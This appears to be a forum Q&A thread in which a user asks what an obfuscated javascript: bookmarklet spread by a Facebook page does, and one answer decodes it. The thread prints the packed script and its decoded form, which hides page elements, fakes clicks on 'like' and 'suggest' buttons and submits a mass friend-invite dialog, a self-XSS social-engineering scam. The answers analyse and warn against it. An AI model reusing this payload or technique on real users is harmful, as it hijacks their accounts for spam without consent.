What exactly does this piece of JavaScript do?

Question

I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.

Simply put, what does this do?

javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\\w+'}
        ;
        c=1}
    ;
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
    return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();

Answer 1

Don't expect someone here de-obfuscating stolen code or code that the original author didn't want to distribute under its readable form.

Answer 2

At first glance, it looks like a packing function, used to compress code into a string. Think of it like gzip compression.

Answer 3

That looks like the code invite your friends to join a group or something along those lines..

They've been floating around facebook for a while.

Answer 4

I don't know so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.

The first trick is to replace the eval on the results of the unpacker with an alert so you can see the code instead of executing it. That gives you something you can easily (but boringly) manually decode to:

document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';        
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

setTimeout(function(){
    fs.select_all()
}, 5000);
setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);        

That looks like it's faking click on the ‘like’ and ‘suggest’ buttons (and subsequent dialogue), circumventing the normal controls FB require to interact with the site.

I'd report this page to FB.

In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor-man's-XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your use of the site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing javascript: URLs in the address bar.

Curse you Netscape for inventing the ugly javascript: not-really-a-URL hack and the thousands of security holes that have resulted from it!